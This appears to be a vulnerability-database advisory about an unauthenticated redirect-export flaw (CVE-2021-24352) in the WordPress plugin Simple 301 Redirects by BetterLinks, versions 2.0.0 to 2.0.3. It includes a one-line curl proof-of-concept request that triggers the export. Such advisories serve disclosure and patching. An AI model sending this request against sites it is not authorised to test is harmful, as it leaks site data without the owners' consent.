Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbChloe ChamberlandWPVDB-ID:D770F1FA-7652-465A-833C-B7178146847D
HistoryMay 26, 2021 - 12:00 a.m.

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Export

2021-05-2600:00:00
Chloe Chamberland
wpscan.com
14
301 redirects
betterlinks
unauthenticated
export
vulnerability

EPSS

0.001

Percentile

47.0%

JSON

The export_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to export a site’s redirects.

PoC

curl -X POST --url “[URL]/wp-admin/admin-post.php?page=301options&export;=true”

Related

cve 1
wpexploit 1
prion 1
cvelist 1
nvd 1
openvas 1
cve
cve
CVE-2021-24352
2021-06-14 14:15:08
wpexploit
wpexploit
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Export
2021-05-26 00:00:00
prion
prion
Design/Logic Flaw
2021-06-14 14:15:00
cvelist
cvelist
CVE-2021-24352 Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Export
2021-06-14 13:37:13
nvd
nvd
CVE-2021-24352
2021-06-14 14:15:08
openvas
openvas
WordPress Simple 301 Redirects by BetterLinks Plugin < 2.0.4 Multiple Vulnerabilities
2021-06-15 00:00:00

EPSS

0.001

Percentile

47.0%

JSON
Related for WPVDB-ID:D770F1FA-7652-465A-833C-B7178146847D
cve1wpexploit1prion1cvelist1nvd1openvas1